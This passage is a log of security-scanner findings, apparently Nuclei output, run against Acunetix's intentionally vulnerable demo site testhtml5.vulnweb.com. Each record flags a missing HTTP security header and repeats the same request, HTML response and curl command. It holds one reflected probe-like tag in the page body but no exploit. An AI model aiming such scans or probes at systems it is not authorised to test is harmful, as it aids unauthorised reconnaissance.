Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506513348Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.50654665Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506573588Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n 